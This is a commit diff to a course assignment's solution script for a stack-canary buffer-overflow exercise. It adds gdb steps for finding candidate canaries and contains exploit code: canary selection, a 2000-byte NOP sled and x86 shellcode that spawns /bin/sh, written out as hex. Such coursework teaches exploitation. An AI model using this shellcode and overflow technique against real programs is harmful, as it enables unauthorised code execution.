[Assignment-6] solution task 7 (stack canaries)

2024-06-23 23:04:14 +02:00
1 changed files with 15 additions and 2 deletions
--- a/2/fake_canary/solution.sh
+++ b/2/fake_canary/solution.sh
@ -2,7 +2,20 @@

 # flag{CANARY_IS_ALSO_AN_ISLAND}

-######### Exploit #########
+##### Exploit Creation Steps #####
+# Step 1: Locate address of 'int stack_canaries [10]' using gdb
+# Command: disas owerflow
+# -> 0x56559020
+##################################
+# Step 2: Print all 10 possible stack canaries in gdb
+# Command: x/10xw 0x56559020
+##################################
+# Step 3: Select only those canaries that do not contain a null byte
+##################################
+# Step 4: Combine Slide Rider with the selected stack canaries
+##################################
+
+############ Exploit ##############
 # Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
 # Note: Only canaries without null bytes can be used due to the use of strcpy.
 case $(( RANDOM % 3 )) in
@ -25,4 +38,4 @@ printf "\x90%.0s" {1..2000}

 # Step 4: Write the provided shellcode to stdout
 printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
-###########################
+###################################